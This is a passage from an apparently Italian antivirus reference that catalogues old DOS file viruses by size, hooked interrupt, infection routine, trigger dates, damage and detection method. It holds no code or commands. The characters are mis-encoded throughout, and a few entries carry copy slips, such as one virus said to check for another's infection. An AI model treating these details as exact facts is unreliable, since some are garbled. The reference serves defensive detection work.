Φ successiva alle quattro del pomeriggio, viene prodotto un suono ed il sistema si blocca. Metodo di rilevazione: Controllare che ci siano file "hidden" con estensione *.COM con 923 Byte di dati. Note: 1) Non rimane in memoria. 2) ACME non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Dest1] Nome del Virus: DEST1. Tipo di Virus: Virus da file (infetta solo i file con estensione *.COM). Lunghezza del Virus: 323 Byte. Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Dest1. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta ogni file con estensione *.COM non infetto, uno alla volta. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 323 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Dest2] Nome del Virus: DEST2. Tipo di Virus: Virus da file (infetta solo i file con estensione *.COM). Lunghezza del Virus: 478 Byte. Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Dest2. Se "SI", il virus continua a cercare file con estensione *.COM. 3) Infetta il file con estensione *.COM originale. Infine esegue il file originale. Danni: Se kill-flag=-1, cancella un file. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 478 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file Dest2 intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Cyber101] Nome del Virus: CYBER101. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 946 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.EXE o *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Cyber101. Se "SI", continua a cercare un file con estensione *.COM o *.EXE. 3) Infetta ogni file con estensione *.EXE o *.COM nella directory corrente, due alla volta. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 946 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, Cyber101 intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Cyber] Nome del Virus: CYBER. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1.092 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.EXE o *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Cyber. Se "SI", continua a cercare un file con estensione *.COM o *.EXE non infetto. 3) Infetta ogni file con estensione *.EXE o *.COM nella directory corrente, due alla volta. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.092 Byte. Note: 1) Non rimane in memoria. 2 Quando infetta i file, Cyber intercetta l'INT 24h. Omette gli errori I/O (come per esempio se protetto da scrittura). [7thson-2] Nome del Virus: 7THSON-2. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 284 o 332 o 350 Byte (COM). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da 7thson-2. Se "SI", continua a cercare file non infetti. 3) Infetta tutti i file con estensione *.COM nella directory corrente. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 284, 332, o 350 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, 7thson-2 intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Bamestra] Nome del Virus: BAMESTRA. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 530 Byte (EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca un file con estensione *.EXE non infetto nella directory corrente. 2) Controlla che sia giα stato infettato da Bamestra. Se "SI", continua a cercare file con estensione .EXE non infetti. 3) Infetta poi due file con estensione .EXE alla volta nella directory corrente. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 530 Byte. Note: 1) Non rimane in memoria. 2) Bamestra intercetta l'INT 24h quando infetta. Omette gli errori I/O (come per esempio protetto da scrittura). [Abraxas] Nome del Virus: ABRAXAS. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 546 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca file con estensione *.EXE o file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Abraxas. Se "SI", continua a cercare un file con estensione *.EXE o *.COM non infetto. 3) Infetta poi tutti i file con estensione *.EXE e *.COM nella directory corrente. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 546 Byte. Note: 1) Non rimane in memoria. 2)Quando infetta i file, Abraxas intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [MPC-1] Nome del Virus: MPC-1. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 641 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.COM o *.EXE nella directory corrente. 2) Controlla che sia giα stato infettato da MPC-1. Se "SI", continua a cercare un file con estensione *.EXE o *.COM non infetto. 3) Infetta poi tutti i file con estensione *.EXE ed i file con estensione *.COM nella directory corrente. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 641 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file MPC-1 intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Zeppelin] Nome del Virus: ZEPPELIN. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1.508 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.COM o *.EXE nella directory corrente. 2) Controlla che sia giα stato infettato da Abraxas. Se "SI", continua a cercare un file con estensione *.EXE o *.COM non infetto. 3) Infetta poi tutti i file con estensione *.EXE ed i file con estensione *.COM nella directory corrente, quattro alla volta. 4) Infine appaiono diversi codici, contemporaneamente si sentono degli strani suoni ed il sistema si blocca. Danni: Appaiono diversi codici, contemporaneamente si sentono degli strani suoni ed il sistema si blocca. Metodo di rilevazione: 1) Il file infetto incrementa le sue dimensioni di 1.508 Byte. 2) Appaiono sullo schermo dei codici. Note: 1) Non rimane in memoria. 3) Quando infetta i file, Zeppelin intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Crumble] Nome del Virus: CRUMBLE. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 778 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.COM o *.EXE nella directory corrente. 2) Controlla che sia giα stato infettato da Crumble. Se "SI", continua a cercare un file con estensione *.EXE o *.COM non infetto. 3) Infetta poi tutti i file con estensione *.EXE ed i file con estensione *.COM nella directory corrente, due alla volta. 4) Controlla la data di sistema; se Φ venerd∞, appare sullo schermo il messaggio "falling letter", quindi ogni 5 secondi cadrα una lettera sullo schermo. Danni: Se Φ venerd∞ apparirα sullo schermo "falling letter." Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 778 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, Crumble intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [COL-MAC] Nome del Virus: COL_MAC. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1022 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.COM o *.EXE nella directory corrente. 2) Controlla che sia giα stato infettato da COL_MAC. Se "SI", continua a cercare un file con estensione *.EXE o *.COM non infetto. 3) Infetta poi un file con estensione *.EXE e *.COM ogni due, nella directory corrente. 4) Mostra sullo schermo un elevato numero di lettere scelte casualmente, finchΘ non si preme il tasto ENTER. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1022 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file COL_MAC intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Galileo] Nome del Virus: GALILEO. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 760 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Controlla che la data di sistema corrisponda a luned∞. Se "SI", il virus danneggia tutti i file dell'hard disk. 2) Cerca i file con estensione *.COM o *.EXE nella directory corrente. 3) Infetta poi tutti i file con estensione *.EXE e i file con estensione *.COM nella directory corrente Danni: Se Φ luned∞, il virus danneggia tutti i file dell'hard disk. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 760 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, Galileo intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Wharps] Nome del Virus: WHARPS. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 572 Byte (COM). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus controlla che l'orologio di sistema segni le ore 3 del mattino. Se "SI", appare sullo schermo questo messaggio: "wHaRpS! It is 3:00 a.m. > ETERNAL." 2) Cerca un file con estensione *.COM nella directory corrente. 3) Controlla quindi che sia giα stato infettato da Wharps. Se "Si", continua a cercare un file con estensione *.COM non infetto, infettando un file alla volta. 4) Infine esegue il file originale. Danni: I file infetti non possono essere eseguiti. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 572 Byte. Note: 1) Non rimane in memoria. 2) Quando infetta i file, Wharps intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Bubbles-2] Nome del Virus: BUBBLES-2. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 927 Byte (COM ed EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file con estensione *.EXE o *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Bubbles-2. Se "SI", continua a cercare file con estensione *.EXE o *.COM. 3) Infetta poi tutti i file con estensione *.COM e *.EXE nella directory corrente. 4) Controlla che la data di sistema sia il giorno 13 e l'anno non sia inferiore al 1993; fa comparire quindi sullo schermo il seguente messaggio: "Bubbles 2 : "Its back and better then ever. Is it me or does that make no sense at all?" Danni: I file infetti non possono essere eseguiti. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 927 Byte. Note: 1) Non rimane in memoria. 2) Bubbles-2 intercetta l'INT 24h mentre infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Cybertech] Nome del Virus: CYBERTECH. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 1.076 Byte (COM). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Controlla che la data di sistema sia inferiore al 1993. Se "SI", il virus cerca un file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Cybertech. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta poi ogni file con estensione *.COM nella directory corrente, uno alla volta. 4) Se "NO", appare sullo schermo il seguente messaggio: "The previous year you have been infected by a virus without knowing or removing it. To be gentle to you I decided to remove myself from your system. I suggest you better buy VirusScan of McAfee to ensure yourself complete security of your precious data. Next time you could be infected with a malevolent virus. May I say goodbye to you for now. CyberTech Virus-Strain A (c) 1992 John Tardy of Trident". Ristabilisce quindi il file corrente. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.076 Byte. Note: 1) Non rimane in memoria. 2) Cybertech intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Crazy] Nome del Virus: CRAZY. Tipo di Virus: Virus del settore di avvio. Lunghezza del Virus: 4.006 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: Questo virus non infetta file, partizione o settore di boot. Quando viene eseguito, crea 50 subdirectory. 50 subdirectory vengono create in ogni subdirectory. Danni: Nessuno. Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) Crazy non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Burger_560-8] Nome del Virus: BURGER_560-8. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM in A:. 2) Controlla che sia giα stato infettato da Burger_560-8. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta poi ogni file non infetto, uno alla volta. 4) Se nessun file con estensione *.COM Φ infettato, il virus continua a cercare file con estensione *.EXE in A:. 5) Infine conferisce estensione *.EXE a file con estensione *.COM ed infetta i file con estensione *.COM. Danni: Sovrascrive il file originale, in questo modo la lunghezza del file infetto non aumenta. Metodo di rilevazione: Cambia i file con estensione *.EXE in file con estensione *.COM. Note: 1) Non rimane in memoria. 2) Burger_560-8 non intercetta l'INT 24h quando infetta i file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Boys] Nome del Virus: BOYS. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 500 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus cerca un file con estensione *.EXE, cambia l'attributo a "SYSTEM". 2) Cerca un file con estensione *.COM nella directory corrente. 3) Controlla quindi che sia giα stato infettato da Boys. Se "SI", continua a cercare un file con estensione *.COM non infetto. 4) Infetta solo un file alla volta e cambia l'attributo a "READ -ONLY". 5) Esegue infine il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 500 Byte. Note: 1) Non rimane in memoria. 2) Boys non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Null] Nome del Virus: NULL. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 733 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Decodifica. 2) Cerca un file con estensione *.COM nella directory corrente. 3) Controlla che sia stato infettato da Null. Se "SI", continua a cercare un file con estensione *.COM non infetto. 4) Infetta solo un file alla volta. 5) Esegue il file originale. 6) Se non pu≥ infettare un file con estensione *.COM, controlla che sia il giorno 30. Se "SI", distrugge tutti i dati del disco e fa comparire il seguente messaggio: "Your disk is dead! Long life Doomsday 1.0." Danni: Se Φ il giorno 30, distrugge tutti i dati del disco. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 733 Byte. Note: 1) Non rimane in memoria. 2) Null non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Vienna-11] Nome del Virus: VIENNA-11. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 943 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che l'orologio dei secondi sia: a .0004. Se "SI", apparirα sullo schermo il seguente messaggio: "Sorry this computer is no longer operational due to an outbreak of Bush is hero, Have a Nice day. . . " 2 Controlla che l'ora sia: 7:45 ed il giorno: 24 marzo. Se "SI", appare sullo schermo il seguente messaggio: "VIPERizer, Strain B (c) 1992, Stin gray/VIPER Happy Valentines Day !" Distrugge poi i dati di tutti i dischi compreso l'hard disk. 3) Se "NO", cerca un file con estensione *.COM nella directory corrente. 4) Controlla che sia giα stato infettato da Vienna-11. Se "SI", continua a cercare un file con estensione *.COM non infetto. 5) Infetta solo un file alla volta ed esegue il file originale. Danni: Distrugge tutti i dati di tutti i dischi. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 943 Byte. Note: 1) Non rimane in memoria. 2) Vienna-11 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Intrud-B] Nome del Virus: INTRUD-B. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 1.225 Byte (EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.EXE nella directory corrente. 2) Controlla che sia stato infettato da Intrud-B. Se "SI", continua a cercare un file con estensione *.EXE non infetto. 3) Infetta un solo file alla volta. 4) Esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.225 Byte. Note: 1) Non rimane in memoria. 2) Intrud-B non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [New-s] Nome del Virus: NEW-S. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 1.214 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Compare una strana figura sullo schermo (con musica). 2) Cerca un file con estensione *.EXE nella directory corrente. Crea poi un file con lo stesso nome della lunghezza di 1214 Byte e sovrascrive il file originale. Il nuovo file Φ New-S. 3) Infine sovrascrive il COMMAND.COM nella directory principale e copia il file sovrascritto nella directory principale. Danni: Sovrascrive il file originale. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.214 Byte. Note: 1) Non rimane in memoria. 2) NEW-S non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [X-1-B] Nome del Virus: X-1-B. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 555 Byte (EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus controlla che la data di sistema sia il giorno 5 marzo. Se "SI", compare il messaggio: "ICE-9 Present In Association with.. The ARcV [X-1] Michelangelo activates. . -<TOMORROW>-," ed il sistema si blocca. 2) Se "NO", cerca un file con estensione *.EXE nella directory corrente. 3) Controlla che sia giα stato infettato da X-1. Se "SI", continua a cercare un file con estensione *.EXE non infetto. 4) Infetta solo un file alla volta. 5) Esegue il file originale. Danni: Se Φ il giorno 5 marzo, compare un messaggio ed il sistema si arresta. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 555 Byte. Note: 1) Non rimane in memoria. 2) X-1 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Lep-FVHS] Nome del Virus: LEP-FVHS. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: Nessuna variazione. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Fa comparire il messaggio: "allocating memoria..... Please wait..... Hard time accessing memoria, please turn off all RAM resident programs and press>>Enter<< to continue...." 2) Il virus cerca un file con estensione *.EXE o con estensione *.COM nella directory corrente. 3) Controlla che sia giα stato infettato da LEP-FVHS. Se "SI", continua a cercare un file con estensione *.EXE o *.COM non infetto.. 4) Se "NO", infetta quattro file con estensione *.EXE o *.COM alla volta nella directory corrente. 5) Fa comparire il seguente messaggio: "Program too big to fit in memoria." Danni: Sovrascrive il file originale, cosicchΘ la lunghezza dei file infetti non aumenta. Metodo di rilevazione: Fa comparire il messaggio: "Allocating memoria...." Note: 1) Non rimane in memoria. 2) LEP-FVHS non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Monxla] Nome del Virus: MONXLA. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 939 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Il virus cerca un file con estensione *.COM nella directory corrente. 2) Controlla che la data di sistema corrisponda al giorno 13. Se "SI", distrugge il file. 3) Se "NO", controlla che sia giα stato infettato da MONXLA. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta poi ogni file con estensione *.COM nella directory corrente. 4) Esegue infine il file originale. Danni: Se la data di sistema corrisponde al giorno 13, il virus distrugge un file con estensione *.COM.. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 939 Byte. Note: 1) Non rimane in memoria. 2) MONXLA non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [More-649] Nome del Virus: MORE-649. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 649 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h), Programma eseguibile. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file eseguito. (b) Non infetta file con estensione *.EXE o file con date particolari (anno successivo al 1999). 4) Quando il virus rileva un file con data successiva al 1999, appare il seguente messaggio: "OH NO NOT MORE ARCV". Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.COM aumentandone la lunghezza di 649 Byte. [Arka] Nome del Virus: ARKA. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 1.905 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h), (Programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue quindi il file originale. 3) Con il virus caricato in memoria viene infettato ogni file eseguibile non infetto. Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.COM aumentandone la lunghezza di 1905 Byte. [578] Nome del Virus: 578. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 578 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h),Programma eseguibile. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. (b) Non infetta i file con estensione *.EXE. 4) Il virus controlla la data di sistema. Se Φ successiva al giorno 3 aprile, distrugge tutti i dati in A: e fa comparire sullo schermo tre bandire colorate ed il seguente messaggio: "ITALY IS THE BEST COUNTRY IN THE WORLD." Danni: Se la data di sistema Φ successiva al giorno 3 aprile, il virus distrugge tutti i dati di A:. Metodo di rilevazione: Infetta i file con estensione *.COM aumentandone la lunghezza di 578 Byte. Note: 1) 578 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [5LO] Nome del Virus: 5LO. Tipo di Virus: In memoria, Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.125-1.140 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h) (programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. (b) Non infetta i file con estensione *.COM. Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.EXE aumentandone la l unghezza di 1.125-1.140 Byte. Note: Il virus 5LO non intercetta l'INT 24h mentre infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Aids 552] Nome del Virus: AIDS552. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 552 Byte (EXE). Vettore PC agganciato: INT 21h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Infetta quando viene eseguito il comando "DEGUG FILE_NAME.EXE". b) Non infetta i file con estensione *.COM. Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.EXE aumentandone la lunghezza di 552 Byte. Note: Il virus AIDS552 non intercetta l'INT 24h mentre infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [408] Nome del Virus: 408. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 408 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Metodo di rilevazione: I file infetti aumentano di 408 Byte. Note: Il virus 408 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [BOOJUM] Nome del Virus: BOOJUM. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 340 Byte (EXE). Vettore PC agganciato: INT 21h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.COM. Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.EXE aumentandone la lunghezza di 340 Byte. Note: Il virus BOOJUM non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Shirley] Nome del Virus: SHIRLEY. Tipo di Virus: In memoria, Virus da file (Infetta i file con estensione *.EXE).. Lunghezza del Virus: 4.110 Byte (EXE). Vettore PC agganciato: INT 21h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta file con estensione *.COM. Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.EXE aumentandone la lunghezza di 4110 Byte. Note: Il virus Shirley non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [D-Tiny] Nome del Virus: D-TINY. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 126 Byte (COM). Vettore PC agganciato: INT 21h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h.. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: Infetta i file con estensione *.COM aumentandone la lunghezza di 126 Byte. Note: D-TINY non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [01-07] Nome del Virus: 01-07. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 639 Byte (COM). Vettore PC agganciato: INT 21h. Metodo di infezione: 1) Il virus controlla che la data di sistema sia tra i giorni 1 e 6 gennaio. Se "SI", compare sullo schermo il messaggio:" Happy New Year " ed il sistema si blocca. Se "NO", il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Il sistema si blocca quando la data Φ compresa tra i giorni 1e 6 gennaio. Metodo di rilevazione: I file infetti aumentano di 639 Byte. Note: Il virus 01-07 non intercetta l'INT 24h mentre infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Bit_Addict] Nome del Virus: BIT_ADDICT. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 477 Byte (COM). Vettore PC agganciato: INT 21h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Quando il virus ha infettato 100 file, distrugge tutti i dati sull'hard disk facendo comparire sullo schermo: "BIT ADDICTMZ> .... The Bit Addict says: You have a good tasting hard disk, it was delicious !!!" Metodo di rilevazione: I file infetti aumentano di 477 Byte. Note: Il virus BIT_ADDICT non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [CSL-2] Nome del Virus: CSL-2. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 709 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 709 Byte. Note: Il virus CSL-2 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Highland] Nome del Virus: HIGHLAND. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 477 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Se la data di sistema corrisponde al giorno16, tutti i file infettati dal virus Highland non possono essere eseguiti. Metodo di 